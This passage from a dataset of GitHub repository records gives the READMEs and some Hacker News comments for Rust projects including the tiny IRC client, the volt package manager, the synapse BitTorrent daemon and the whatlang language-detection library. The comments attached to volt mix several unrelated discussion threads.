[`ravedude`](./ravedude) [![crates.io page](https://img.shields.io/crates/v/ravedude.svg)](https://crates.io/crates/ravedude)\n`ravedude` is a utility for seamlessly integrating avrdude and a serial console into the cargo workflow. With a bit of configuration (check its [README](./ravedude/README.md)!) you can then upload your code to your board and view its output over the serial console by just using `cargo run` as you would normally.\n\n[avr-hal-generic docs]: https://rahix.github.io/avr-hal/avr_hal_generic/index.html\n[arduino-hal docs]: https://rahix.github.io/avr-hal/arduino_hal/index.html\n[atmega-hal docs]: https://rahix.github.io/avr-hal/atmega_hal/index.html\n[attiny-hal docs]: https://rahix.github.io/avr-hal/attiny_hal/index.html\n\n## Disclaimer\nThis project is not affiliated with Microchip (formerly Atmel) or any of the vendors that created the boards supported in this repository.\n\n## License\n*avr-hal* is licensed under either of\n\n * Apache License, Version 2.0 ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n## Contribution\nUnless you explicitly state otherwise, any contribution intentionally submitted for inclusion in the work by you, as defined in the Apache-2.0 license, shall be dual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "osa1/tiny", "link": "https://github.com/osa1/tiny", "tags": ["irc-client", "rust", "terminal-app"], "stars": 826, "description": "A terminal IRC client ", "lang": "Rust", "repo_lang": "", "readme": "# tiny - Yet another terminal IRC client\n\ntiny is an IRC client written in Rust.\n\n
\n\n## Features\n\n- Clean UI: consecutive join/part/quit messages are shown in a single line, and the\n time stamp of a message is omitted if it's the same as that of the previous message.\n (inspired by [irc-core](https://github.com/glguy/irc-core))\n\n- All mentions of the user are collected in a \"mentions\" tab, including server\n and channel information. The \"mentions\" tab solves the problem of missing mentions\n of you in channels after hours of inactivity.\n\n- Mentions of the user in a channel are highlighted (the channel tab is also\n highlighted in the tab list)\n\n- Simple config file format for automatically connecting to servers, joining\n channels, registering the nickname etc. See the [configuration\n section](#configuration) below.\n\n- Nick tab-completion in channels\n\n- Nicks in channels are colored.\n\n- Disconnect detection and automatic reconnects. You can keep tiny running on\n your laptop and it automatically reconnects after a sleep etc.\n\n- Configurable key bindings inspired by terminal emulators and vim. See the [key\n bindings section](#key-bindings) below.\n\n- Configurable colors\n\n- SASL authentication\n\n- Configurable desktop notifications on new messages (an opt-in feature behind a\n feature flag, see below)\n\n- znc compatible\n\n- TLS support\n\n## Installation\n\ntiny works on Linux and OSX. Windows users can run it under Windows Subsystem\nfor Linux.\n\nFor pre-built binaries see [releases]. To build from source make sure you have\nRust 1.48 or newer. By default tiny uses [rustls] for TLS support, and desktop\nnotifications are disabled.\n\n[releases]: https://github.com/osa1/tiny/releases\n[rustls]: https://github.com/ctz/rustls\n\n- To use the system TLS library (OpenSSL or LibreSSL), add `--no-default-features\n --features=tls-native` to the command you're using. Note that this requires\n OpenSSL or LibreSSL headers and runtime libraries on Linux.\n\n- To enable desktop notifications add `--features=desktop-notifications`. This\n requires libdbus on Linux.\n\nTo install in a clone:\n\n```\ncargo install --path crates/tiny\n```\n\nIf you don't want to clone the repo, you can use\n\n```\ncargo install --git https://github.com/osa1/tiny\n```\n\nIf you have an older version installed, add `--force` to the command you're\nusing.\n\nArch Linux users can install tiny from the [AUR].\n\n[AUR]: https://aur.archlinux.org/packages/tiny-irc-client-git/\n\ntiny is tested on Linux and OSX.\n\n## Configuration\n\ntiny looks in these places for a config file:\n\n- On Linux: `$XDG_CONFIG_HOME/tiny/config.yml`, on macOS:\n `$HOME/Library/Application Support/tiny/config.yml`\n- (when not found) `$HOME/.config/tiny/config.yml`\n- (when not found, deprecated) `$HOME/.tinyrc.yml`\n\nWhen a config file is not found in one of these locations, tiny creates one in\nthe first path above with defaults and exits, printing the path to the config file.\nEdit that file before re-running tiny to change the defaults.\n\n**A note on nick identification:** Some IRC servers such as ircd-seven (used by\nFreenode) and InspIRCd (used by Mozilla) support identification via the `PASS`\ncommand. This way of identification (rather than sending a message to a service\nlike `NickServ`) is better when some of the channels that you automatically\njoin require identification. 
To use this method, enter your nick password into the\n`pass` field in servers.\n\n### Using external commands for passwords\n\nWhen a password field in the config file is a map with a `command` key, the\nvalue is used as the shell command to run to get the password.\n\nFor example, in this config:\n\n```yaml\nsasl:\n username: osa1\n password:\n command: 'pass show \"my irc password\"'\n```\n\ntiny runs the `pass ...` command and uses the last line printed by the command as\nthe password.\n\n## Command line arguments\n\nBy default (i.e. when no command line arguments are passed) tiny connects to all\nservers listed in the config. tiny considers command line arguments as patterns\nto be matched in server addresses, so you can pass command line arguments to\nconnect to only a subset of the servers specified in the config. For example, in\nthis config:\n\n```yaml\nservers:\n - addr: chat.freenode.net\n ...\n\n - addr: irc.gnome.org\n ...\n```\n\nBy default tiny connects to both servers. You can connect to only the first\nserver by passing `freenode` as a command line argument.\n\nYou can use `--config <path>` to specify your config file location.\n\n## Key bindings\n\nKey bindings can be configured in the config file, see the [wiki\npage][key-bindings-wiki] for details.\n\nDefault key bindings:\n\n- `C-a`/`C-e` move cursor to beginning/end in the input field\n\n- `C-k` delete rest of the line\n\n- `C-w` delete a word backwards\n\n- `C-left`/`C-right` move one word backward/forward\n\n- `page up`/`page down`, `shift-up`/`shift-down`, or `C-u`/`C-d` to scroll\n\n- `C-n`/`C-p` next/previous tab\n\n- `C-c enter` quit (asks for confirmation)\n\n- `alt-{1,9}` switch to nth tab\n\n- `alt-{char}` switch to next tab with underlined `char`\n\n- `alt-0` switch to last tab\n\n- `alt-left/right` move tab to left/right\n\n- `C-x` edit current message in `$EDITOR`\n\n[key-bindings-wiki]: https://github.com/osa1/tiny/wiki/Configuring-key-bindings\n\n## Commands\n\nCommands start with the `/` character.\n\n- `/help`: Show help messages for the commands listed below.\n\n- `/msg <nick>`: Send a message to a user. Creates a new tab.\n\n- `/join <channel>`: Join a channel\n\n- `/close`: Close the current tab. Leaves the channel if the current tab is a\n channel. Leaves the server if the tab is a server. You can use `/close <message>` to send a goodbye message.\n\n- `/connect <host>:<port>`: Connect to a server. Uses `defaults` in the\n config file for nick, realname, hostname and auto cmds.\n\n- `/connect`: Reconnect to the current server. Use this if you don't want to wait\n for tiny to reconnect automatically after a connectivity problem.\n\n- `/away <message>`: Set away status\n\n- `/away`: Remove away status\n\n- `/nick <nick>`: Change nick\n\n- `/names`: List all nicks in the current channel. You can use `/names <nick>` to\n check if a specific nick is in the channel.\n\n- `/reload`: Reload TUI configuration\n\n- `/clear`: Clear tab contents\n\n- `/switch <string>`: Switch to the first tab which has the given string in its name.\n\n- `/ignore`: Ignore `join/quit` messages in a channel. Running this command in\n a server tab applies it to all channels of that server. You can check your\n ignore state in the status line.\n\n- `/notify [off|mentions|messages]`: Enable and disable desktop notifications.\n Running this command in a server tab applies it to all channels of that\n server. You can check your notify state in the status line.\n\n- `/quit`: Quit. 
You can use `/quit <message>` to send a goodbye message.\n\n## Server commands\n\nFor commands not supported by tiny as a slash command, sending the command in\nthe server tab will send the message directly to the server.\n\n### Examples:\n\n- `LIST` will list all channels on the server\n- `MOTD` will display the server Message of the Day\n- `RULES` will display server rules\n- etc...\n\n## Community\n\nJoin us at #tiny in [irc.oftc.net][oftc] to chat about anything related to tiny!\n\n[oftc]: https://www.oftc.net/\n", "readme_type": "markdown", "hn_comments": "I\u2019m curious. Anyone know how this compares to irssi and other common irc clients?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dimensionhq/volt", "link": "https://github.com/dimensionhq/volt", "tags": ["package-manager", "rust", "javascript", "node", "js", "fast", "new", "volt", "hacktoberfest"], "stars": 825, "description": "An experimental package management tool for JavaScript. Up to 30x faster installation of dependencies using pre-flattened dependency trees.", "lang": "Rust", "repo_lang": "", "readme": "
# Volt\n\nRapid, reliable and robust JavaScript package management.
\n\n**Warning**: Volt is still in the alpha stage of development and is not ready for use in production or development environments!\n\n**Rapid**: Volt is incredibly fast and powerful.\n\n**Reliable**: Volt is built to be reliable and dependable.\n\n**Robust**: Volt works with low resource usage.
\n\n# :zap: Installation\n\nWe don't have an official release of Volt yet. However, if you would like to give it a try, feel free to follow the steps below to build it from source.
\n\n## Build From Source\n\nPrerequisites: **Git**, **Rust Toolchain**\n\n### Minimum Supported Rust Version (MSRV)\n\nRust 1.58\n\n### Steps\n\n1. Clone the GitHub repository using Git.\n\n```powershell\ngit clone https://github.com/voltpkg/volt\n```\n\n2. Change to the `volt` directory.\n\n```powershell\ncd volt\n```\n\n3. Run a compiled and optimized build.\n\n```\ncargo run --release -- --help\n# you should see a help menu from Volt\n```
\n\n## :test_tube: Testing\n\nFirst, make sure you [**Build From Source**](https://github.com/voltpkg/volt/#build-from-source).\n\nRun this command to run the tests for volt:\n\n```powershell\ncargo test\n```
\n\n## :clap: Supporters\n\n[![Stargazers repo roster for @voltpkg/volt](https://reporoster.com/stars/voltpkg/volt)](https://github.com/voltpkg/volt/stargazers)\n\n[![Forkers repo roster for @voltpkg/volt](https://reporoster.com/forks/voltpkg/volt)](https://github.com/voltpkg/volt/network/members)
\n\n## :hammer: Build Status\n\nLegend: \ud83c\udfd7\ufe0f = in progress, \u274c = not started.\n\n| Feature | Build Status |\n| -------- | ------------ |\n| Add | \ud83c\udfd7\ufe0f |\n| Audit | \u274c |\n| Cache | \u274c |\n| Check | \u274c |\n| Clone | \ud83c\udfd7\ufe0f |\n| Compress | \ud83c\udfd7\ufe0f |\n| Create | \ud83c\udfd7\ufe0f |\n| Deploy | \ud83c\udfd7\ufe0f |\n| Fix | \u274c |\n| Help | \ud83c\udfd7\ufe0f |\n| Info | \u274c |\n| Init | \ud83c\udfd7\ufe0f |\n| Install | \ud83c\udfd7\ufe0f |\n| List | \ud83c\udfd7\ufe0f |\n| Login | \ud83c\udfd7\ufe0f |\n| Logout | \u274c |\n| Migrate | \ud83c\udfd7\ufe0f |\n| Mod | \u274c |\n| Outdated | \u274c |\n| Owner | \u274c |\n| Ping | \ud83c\udfd7\ufe0f |\n| Publish | \u274c |\n| Remove | \u274c |\n| Run | \ud83c\udfd7\ufe0f |\n| Search | \u274c |\n| Set | \u274c |\n| Stat | \u274c |\n| Tag | \u274c |\n| Team | \u274c |\n| Update | \u274c |\n| Watch | \ud83c\udfd7\ufe0f |
\n\n## Built With\n\n[Rust](https://www.rust-lang.org/)\n\n[External Libraries](https://github.com/voltpkg/volt/blob/dev/CREDITS.md)\n\n## Versioning\n\nWe use [semver](https://semver.org/) for versioning. For the versions available, see the [tags on this repository](https://github.com/voltpkg/volt/tags).\n\n## License\n\nThis project is licensed under Apache-2.0 - see the [LICENSE.md](LICENSE) file for details.\n", "readme_type": "markdown", "hn_comments": "Heads up, you forgot to handle confused deputy in your IAM Role policy: (In 'Configuring IAM role' at https://docs.paigo.tech/ can't link to a page), which means anyone can pass a role (e.g. for another user) and you'll assume it.Check out https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-de... for how to handle it. You need to require and use an 'ExternalId'.Super excited to see you launching here Dan, wishing you the best of luck!Much needed! Congrats on the launch, Daniel and Matt.> Matt and I came to this project after we built similar internal billing systems at previous jobs and we realized how error-prone these systems can be\u2014one incident might have even undercharged a client by a few million dollars!A BigCloud provider (no points for guessing) I worked for found out how they were undercharging customers due to a bug, and so they fixed the bug for new customers, but continued to undercharge customers grandfathered in.> However this allows us to Pull, any custom metrics and dimensions directly from your Datastore.Most SaaS providers would rather push data than have it pulled, is what I'd imagine. Are you hearing otherwise from folks you've been speaking with? For instance, in serverless environments (which is the poison of choice for me, at least), pull is much harder to accomplish, even where possible.> All of this data is then processed and sent to our backend usage journal, where we store it in an append-only ledger pattern.Apparently, a BigCloud, in perhaps a case of NIH, ended up creating a highly-parallel event-queue as a direct result of the scale it was dealing with: https://archive.is/IUKvT Curious to hear how you deal with the barrage of multi-dimensional events?> Additionally, we also help you understand your cost to serve your clients\u2019 usage, and this data allows us to provide your SaaS with usage based billing.2 cents: Fly.io Machines is a tremendous platform atop which I fully expect businesses to build multiple successful SaaS products; maybe that's one niche for you folks to focus on and own.> We bill based on invoiced revenue (surprise surprise its usage based) and we have a platform fee, roughly it breaks down to 1% of invoiced revenue on Paigo.This sounds a bit steep. I know for a fact that togai.com is also in private beta (their choice of datastore is TimescaleDB, and event-store is NATS), but I'm unsure what their pricing model is; I'd be surprised if it is the same as paigo's.Congrats on launching a product of this complexity! Best of luck.I'm staring down the barrel of a potential usage pricing implementation, and I'm glad the majority of the foundational work is already done. 
It'd be no cakewalk to implement from scratch.How do you generally address the risks of read access, GDPR, and other similar security and privacy concerns related to your technical model?FYI your \"stateless and signupless demo\" link isn't linking, and copying/pasting the link didn't work.Do you act as merchant of record (to handle VAT)?\nThere are so many solutions out there that use Stripe for billing, which involves so much extra work for European founders.So basically this is subscription/recurring invoicing based on usage/metered billing - SaaS/hosting providers/electricity providers etc.Try/check Zoho Subscriptions (I am a happy customer of \"Zoho Subscriptions\") - they support many features: metered billing, payment methods, many integrations, etc., without collecting much data (only the minimum needed). And very good tech as well as non-tech customer support! And they charge a reasonable fixed, transparent and predictable price.I understand the need and pain point, and multiple players can exist; the key is to have transparent pricing. (You can always have a custom plan/discount/change in pricing in the future for future customers.)Also, who is your target customer? \nTech companies will likely implement their own billing software or use existing proven players.I think (happy to be wrong!) - \n1. Try to find non-core-tech/offline subscription services and learn what their pain points are. \n2. Why only usage based billing?I know there are very few tools/software for SaaS/recurring/subscription based billing (Zoho, Chargebee, Recurly, Shopify, to name a few) so I wish you good luck.Congrats Daniel and Matt - great to see you guys hit this milestone :)This honestly doesn't lend me the confidence in your solution that I assume you think it does ;P. \"We've done this before, and dude... we failed at it SO BAD, you just don't understand: this is HARD. So, instead of doing it yourself, you'd be much better off out-sourcing that effort... to us.\" :( It is a subtle difference, I admit, between versions of this pitch that work and the ones that don't, but this one just didn't work for me.Sounds useful. 
Not sure I\u2019d trade a 1% reduction in revenue across the board for this though.I'm curious how you'd compare yourselves to https://metronome.com which is another player in the space?A technical question:I'm curious how you ship, aggregate and store usage data in a resilient (network partition tolerant), scalable and cost efficient way.Your documentation doesn't seem to peek under the hood.(Disclaimer: I'm currently building such a system, but using a third party wouldn't be viable in that context)Perhaps a view of data at different locality scales in different windows?See figure 2 of the subspace explorer in https://www.cs.uic.edu/~wilkinson/Publications/visualpattern...Pick your statistical software package & chart to generate code for!\nhttps://chartmaker.visualisingdata.comSome stories not safe for work viewing!\nLongform data journalism stories (aka visual statistics case studies): https://pudding.cool/Small collection of book covers (~5,000) : https://pudding.cool/2019/07/book-covers/On the 'more animated' side of things : https://hypertools.readthedocs.io/en/latest/**different visual demonstrations : https://www.datavis.ca/gallery/delights.phpEdward Tufte has looked at various ways to present data : https://www.amazon.com/Edward-R-Tufte/e/B000APET3Y/ref=aufs_... / https://www.edwardtufte.com/tufte/**Make the quantum leap and use Feynman diagrams to construct the network ( https://www.ias.edu/ideas/2009/arkani-hamed-oconnell-feynman... )**So, you could take the idea of the scatter plot matrix in https://www.cs.uic.edu/~wilkinson/Publications/sorting.pdf and use the various plots to literally build a picture as represented in Excel cells as \"picture\" : https://www.youtube.com/watch?v=UBX2QQHlQ_I and https://jpg.space/mmmatto/exhibition/Mathcastles-%3E-Sandcas...Hypercastle explorer for terraforms : https://www.youtube.com/watch?v=1jD6F_6_YakAlthough, that kind of starts to get into coding. ;)https://direct.mit.edu/leon/article-abstract/48/4/375/45993/...http://lightpattern.info/https://esolangs.org/wiki/ObjectArthttps://www.dangermouse.net/esoteric/piet.html**Obligatory HN 'lisp' link : https://web.archive.org/web/20110504131632/http://sas.uwater...Meta-visualization / statistical use cases links site : https://www.tableau.com/learn/articlessample links:https://www.tableau.com/learn/articles/data-science-blogshttps://www.tableau.com/learn/articles/best-data-visualizati...Many great new avenues of inquiry here - I thought the thread had died for lack of interest. Thanks to everyone!Gephi [1] is a software suite to visualize social media datasets.Demo / feature pages [2][3] show different approaches to visualizing different social media datasets.Uncertain about the current status of software support/development.-----------------------[1] https://en.wikipedia.org/wiki/Gephi[2] http://www.martingrandjean.ch/gephi-introduction/[3] Gephi home page : https://github.com/gephi/gephi/releasesLocality means making a lot of comments in the same threads. Note that it will bring into close contact people who agree a lot and also people who disagree a lot.I'd try using the 2nd and 3rd eigenvectors of the Laplacian of the graph. I have heard about a lot of good properties of theirs, but I have never used them, so I'm not sure how tricky it is to get a nice graph. Something like https://math.stackexchange.com/questions/3853424/what-does-t...This is a super-interesting question.I don't think it is quite the answer to your question, but I have seen combined heatmaps/dendrograms that feel like a possibility for this? 
Maybe the heatmap deals with activity between nodes and the dendrogram handles the community cluster relationships? I see them often in bioinformatics.\nEx: https://en.wikipedia.org/wiki/Dendrogram#/media/File:Heatmap...https://digitalarrtarchive.siggraph.org/exhibition/siggraph-...https://arxiv.org/abs/1806.09823 - you can use this to find nearest neighbors to reduce the number of elements you are considering (or maybe not). Then you need: https://en.wikipedia.org/wiki/Dimensionality_reduction amazing! sounds very interestingTop line:\n> Fleet is the blazing fast build toolMy primate pattern-matching brain says this is functionality-poor compared to its alternatives, or the alternatives it compares to are poor examples.I\u2019m excited to see this! Given that sccache integrates with cloud storage, this looks fairly straightforward to integrate in a CI/CD workflow, did I get that right?Not to be confused with https://www.jetbrains.com/fleet/The site and repo readme are quite light on details of how this works.Does it do anything else besides using sccache and lld/zld? I'd expect so, since these tools don't require Rust nightly, whereas fleet does.---Edit:After a quick look over the code, it also sets codegen units to 256, but doesn't seem to do anything else.I see the same improvements from manually adding sccache and mold to ~/.cargo/config.toml when building volt, without touching the repo's Cargo.toml.standard rust config: 1m20s\nsccache + mold: 30s\nI ran the tests with Rust 1.60.0, on Linux, on an AMD 5850U (6 core, mobile).I installed it via the cargo install method, do I have to do anything else like modify cargo config files?Nice, faster Rust builds are always welcome.I wonder if in the future some service might even offer prebuilt crates for the various architectures. I think that idea was brought up at some point.> For a production repository (infinyon/fluvio) which we tested, we were able to cut down our incremental build times from 29 seconds down to 9 seconds, boosted by Fleet. We saw even better results on dimensionhq/volt, with our build times cut down from 3 minutes to just 1 minute - a 3x speed improvement!Not sure your maths are correct here.which flavor of Forth should I look at if I don't want to deal with the historical page sizes? (not sure of the nomenclature since I last looked at Forth)And here's an archive of what appears to be all issues of \"Forth Dimensions\": http://soton.mpeforth.com/flag/fd/contents.htmlEnjoy.Hey, if you're looking to try writing some simple Forth code in a fun context, I recommend you try playing grobots:http://grobots.sourceforge.net/I recommend you do the basics of the tutorial, then watch some matches with the provided sides.https://grobots.fandom.com/wiki/Tutorials/BeginnerOn the other hand, according to this[0] author who ported a game from assembly to C and Forth, Forth seems to drastically increase development time and perform 10-20 times worse than the equivalent assembly.[0] http://calc6502.com/RobotGame/summary.htmlFlipping through this magazine just made me realize how much I miss computer magazines and hacking culture in the 80s/90s.I was developing Open Boot - the Forth-based firmware that eventually became Open Firmware AKA the IEEE 1275-1994 Standard - at Sun back in the late '80s. 
It was intended to replace Sun's existing \"sunmon\" firmware which was written in C. The diagnostics group that maintained sunmon was adamantly opposed to Open Boot, probably mainly because it threatened their ownership of the firmware. They argued against Open Boot, thinking that they had an ironclad argument: \"Forth is interpreted, therefore it is too slow\". The argument totally backfired because I knew some facts about the hardware that had apparently escaped them. The dominant factor in the perceived firmware speed was scrolling text on the non-accelerated megapixel frame buffer. That involved a megapixel memory-to-memory copy for every line. On the monochrome display it was terrible and on the color frame buffer it was horrendous. The sunmon firmware ran from EPROM, whose access time was glacial compared to RAM and even worse compared to cache - and EPROM was not cacheable. To make matters even worse, on the SPARCstation 1 that was the first target for Open Boot, the EPROM data width was only 8 bits, so a 32-bit instruction fetch took 4 super slow EPROM accesses. You see where I am going with this, right? All it took to leave sunmon in the dust was to copy the screen-scrolling and bitblt routines into RAM. Just to pour salt on the wound, I also copied the modest-sized set of code words at the core of Forth into RAM. Direct-threaded Forth ran from RAM substantially faster than compiled C code ran from EPROM. Our project manager did not let me turn on the cache on the first shipment, worrying about bugs, but relented on later revisions. After the cache was turned on, Forth just flew. The fact that Forth is so well-factored, and the actual machine code is confined to a small compact area, meant that the cache performed extremely well. Furthermore, since Forth didn't need to use the SPARC register windowing mechanism - register windows were designed for C-style stack frames and are essentially useless for Forth stacks - the endemic SPARC problem of window spill and fill handlers didn't affect the firmware at all. That made the firmware much more adept at post-mortem examination of kernel crashes.In a lot of system code, the performance can be dominated by access to devices that are much slower than cache. In that environment, so long as you are careful about a few CPU intensive routines like memcpy and bitblt, threaded code can be nearly as fast as compiled code, and sometimes faster. And it is much more compact, which matters a lot when you have to fit everything into some flavor of ROM.Whoever likes Forth might really enjoy PostScript (yeah, that printer-oriented language). It is probably the most used stack-based language around.If you haven't ever used Forth or made a Forth interpreter, it's a fun project that I recommend doing.I don't remember a lot about Forth, except this. After programming in (8-bit) assembler for about a year, I tried Forth. Getting the -code done- in -so little- time, I grinned broadly as I played Frisbee in that saved time.There's no way to save time like that any more; the computer's done -before- you finish typing 'run'. (Well, ok, infinite loops aren't any faster, they just get -much closer to infinity. I postulate.)Anyway, those old mags always bring back that sense of WHOA! (I still have Kilobaud #1 and #2.)Why are people speaking a lot about Forth this year? 
Nothing against (I love Forth), just curious.Forth isn't slow because it can be compiled to machine code, which is not even touched on by the article.The main argument of the article seems to be reiterating the idea that in a tree, most of the nodes are leaves. For instance, in a balanced binary tree containing 2^n-1 nodes, a little over half the nodes are leaves. So if we visualize the call graph as traversing a tree, where the leaves are primary primitives in machine language, the bulk of the activity is always going on in the machine language leaves. When a primitive operation returns, much of the time control soon passes to another primitive operation, staying near the bottom of the tree.Browsing the web: ignores every ad, installs blockersReading old computer magazines: reads every ad, considers if copies of ancient literature still existI suppose it's too easy to game :(How do you plan to get users to install the extension? Why not cut out the \"user\" and just buy the data from internet providers?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Luminarys/synapse", "link": "https://github.com/Luminarys/synapse", "tags": [], "stars": 822, "description": "Synapse BitTorrent Daemon", "lang": "Rust", "repo_lang": "", "readme": "# synapse\n[![Rust Build](https://github.com/Luminarys/synapse/actions/workflows/rust.yml/badge.svg)](https://github.com/Luminarys/synapse/actions/workflows/rust.yml)\n\n\nSynapse is a flexible and fast BitTorrent daemon.\n\nIt currently supports most systems which implement epoll or kqueue, with a focus on 64-bit linux servers.\n\n## About\n* Event based RPC using websockets\n* HTTP downloads and TLS for easy server usage\n* Can be used via web client with minimal setup - see [receptor](https://web.synapse-bt.org)\n* See [this wiki page](https://github.com/Luminarys/synapse/wiki/Feature-Stability) for an overview of stability\n\n## Installation\n### Package\nA list of packages can be found on [this wiki page](https://github.com/Luminarys/synapse/wiki/Third-party-packages).\n\n### Compiling\nInstall dependencies:\n\n- rustc >= 1.39.0\n- cargo >= 0.18\n- gcc | clang\n\nSynapse and sycli can be installed with:\n```\ncargo build --release --all\ncargo install --path .\ncargo install --path ./sycli/\n```\n\nIf you'd just like to install sycli:\n```\ncargo build --release -p sycli\ncargo install --path ./sycli/\n```\n\n## Configuration\nSynapse expects its configuration file to be present at `$XDG_CONFIG_DIR/synapse.toml`,\nor `~/.config/synapse.toml`.\nIf it is not present or invalid, a default configuration will be used.\nThese defaults are given in `example_config.toml`.\n\nSycli can be configured in a similar manner, using `sycli.toml`.\n\n### Desktop application\n\nCopy [`share/synapse/applications/synapse.desktop`] to `$XDG_DATA_HOME/applications` or `~/.local/share/applications`.\n\n[`share/synapse/applications/synapse.desktop`]: share/synapse/applications/synapse.desktop\n\n[XDG MIME Applications] example configuration:\n\n`~/.config/mimeapps.list`\n\n``` ini\n[Default Applications]\nx-scheme-handler/magnet=synapse.desktop\n```\n\n[XDG MIME Applications]: https://wiki.archlinux.org/index.php/XDG_MIME_Applications\n\n## Development\nPlease see [this issue](https://github.com/Luminarys/synapse/issues/1) for details on development status.\nIf you're interested in developing a client for synapse, see `doc/RPC` for the current RPC spec.\nif you'd like to contribute to synapse, see `doc/HACKING`.\n", "readme_type": "markdown", 
"hn_comments": "It would be great to have a client that works well for seeding massive amounts of torrents (100,000+) on weak hardware (like a Raspberry). The main problem seems to be memory usage.How is the memory usage of this one?It says it is light-weight. What kind of light-weight is it and are there some metrics?Awesome work, congrats!Doesn\u2019t seem to solve any new problemNot that I'm not always eager to see something get rewritten in Rust, but I'm curious whether web browsers have advanced to the point where a bittorrent client could exist as a webapp rather than requiring native installation. Could the bittorrent protocol operate over WebRTC?For automation software, transmission (BitTorrent-client written in python, slow) seems to be the standard.If it could offer a transmission-compatible API-layer, I bet it would receive much more interest.Edit: apparently not written in python. My bad.So, if I understand this correctly, Rust would be a good fit for bittorrent, right?\nHandling lots of stuff simultaneously, peers, trackers etc, to me a bittorrent that actually does more than download and quit always seems like something quite heavy...> in RustSaying what language a program uses only describes its grammar and runtime. Saying what dialect a program uses also describes its idioms.https://en.wikipedia.org/wiki/Programming_idiomFor (a simple) example, actix-web uses actix, a library that largely changes the nature of writing Rust code. This might be called Rust-a or Rust', or something.https://github.com/actix/actix-webMy point is that Rust is a really cool language where \"the(/some) (sub)community(ies)\" are developing and coalescing around great libraries outside of core std, making a very* robust language, or rather robust language dialect.Interesting ! I tried integrating transmission for downloading content in a video wall app and it was a bit of a nightmare.Hopefully this will be better - please have a sane remote API.One thing that Azeurus did really well, that transmission really did not -You could can tell azeurus to re-check all the files that are there so it can find out how far it's got.In Azeurus I used this to reconstruct a large torrent by adding files that I found, then telling it to re-check.Transmission couldn't even tell if the files the torrent pointed at had been deleted from under it.Unfortunate name clash (https://github.com/matrix-org/synapse)", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "greyblake/whatlang-rs", "link": "https://github.com/greyblake/whatlang-rs", "tags": ["language", "rust", "nlp", "text-analysis", "text-classification", "classifier", "ai", "detect-language", "language-recognition", "whatlang", "algorithm", "text-classifier", "rustlang"], "stars": 822, "description": "Natural language detection library for Rust. Try demo online: https://whatlang.org/", "lang": "Rust", "repo_lang": "", "readme": "
# Whatlang\n\nNatural language detection for Rust with focus on simplicity and performance.\n\nTry the [online demo](https://whatlang.org/).\n\n
\n\n[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://stand-with-ukraine.pp.ua/)\n\n## Content\n* [Features](#features)\n* [Get started](#get-started)\n* [Who uses Whatlang?](#who-uses-whatlang)\n* [Documentation](https://docs.rs/whatlang)\n* [Supported languages](https://github.com/greyblake/whatlang-rs/blob/master/SUPPORTED_LANGUAGES.md)\n* [Feature toggles](#feature-toggles)\n* [How does it work?](#how-does-it-work)\n * [How language recognition works?](#how-language-recognition-works)\n * [How is_reliable calculated?](#how-is_reliable-calculated)\n* [Running benchmark](#running-benchmarks)\n* [Comparison with alternatives](#comparison-with-alternatives)\n* [Ports and clones](#ports-and-clones)\n* [Donations](#donations)\n* [Derivation](#derivation)\n* [License](#license)\n* [Contributors](#contributors)\n\n\n## Features\n* Supports [69 languages](https://github.com/greyblake/whatlang-rs/blob/master/SUPPORTED_LANGUAGES.md)\n* 100% written in Rust\n* Lightweight, fast and simple\n* Recognizes not only a language, but also a script (Latin, Cyrillic, etc)\n* Provides reliability information\n\n## Get started\n\nExample:\n\n```rust\nuse whatlang::{detect, Lang, Script};\n\nfn main() {\n let text = \"\u0108u vi ne volas eklerni Esperanton? Bonvolu! Estas unu de la plej bonaj aferoj!\";\n\n let info = detect(text).unwrap();\n assert_eq!(info.lang(), Lang::Epo);\n assert_eq!(info.script(), Script::Latin);\n assert_eq!(info.confidence(), 1.0);\n assert!(info.is_reliable());\n}\n```\n\nFor more details (e.g. how to blacklist some languages) please check the [documentation](https://docs.rs/whatlang).\n\n## Who uses Whatlang?\n\nWhatlang is used within the following big projects as direct or indirect dependency for language recognition.\nYou're gonna be in a great company using Whatlang:\n\n* [Sonic](https://github.com/valeriansaliou/sonic) - fast, lightweight and schema-less search backend in Rust.\n* [Meilisearch](https://github.com/meilisearch) - an open-source, easy-to-use, blazingly fast, and hyper-relevant search engine built in Rust.\n\n## Feature toggles\n\n| Feature | Description |\n|-------------|---------------------------------------------------------------------------------------|\n| `enum-map` | `Lang` and `Script` implement `Enum` trait from [enum-map](https://docs.rs/enum-map/) |\n| `arbitrary` | Support [Arbitrary](https://crates.io/crates/arbitrary) |\n| `dev` | Enables `whatlang::dev` module which provides some internal API.
It exists for profiling purposes, and normal users are discouraged from relying on this API. |\n\n## How does it work?\n\n### How does the language recognition work?\n\nThe algorithm is based on trigram language models, which is a particular case of n-grams.\nTo understand the idea, please check the original whitepaper [Cavnar and Trenkle '94: N-Gram-Based Text Categorization](https://www.researchgate.net/publication/2375544_N-Gram-Based_Text_Categorization).\n\n### How is `is_reliable` calculated?\n\nIt is based on the following factors:\n* How many unique trigrams are in the given text\n* How big is the difference between the first and the second (not returned) detected languages? This metric is called `rate` in the code base.\n\nTherefore, it can be presented as a 2D space with threshold functions that split it into \"Reliable\" and \"Not reliable\" areas.\nThis threshold function is a hyperbola:\n\n(figure: language reliability threshold hyperbola)\n\nFor more details, please check the blog article [Introduction to Rust Whatlang Library and Natural Language Identification Algorithms](https://www.greyblake.com/blog/introduction-to-rust-whatlang-library-and-natural-language-identification-algorithms/).\n\n## Make tasks\n\n* `make bench` - run performance benchmarks\n* `make doc` - generate and open docs\n* `make test` - run tests\n* `make watch` - watch changes and run tests\n\n## Comparison with alternatives\n\n| | Whatlang | CLD2 | CLD3 |\n| ------------------------- | ---------- | ----------- | -------------- |\n| Implementation language | Rust | C++ | C++ |\n| Languages | 69 | 83 | 107 |\n| Algorithm | trigrams | quadgrams | neural network |\n| Supported Encoding | UTF-8 | UTF-8 | ? |\n| HTML support | no | yes | 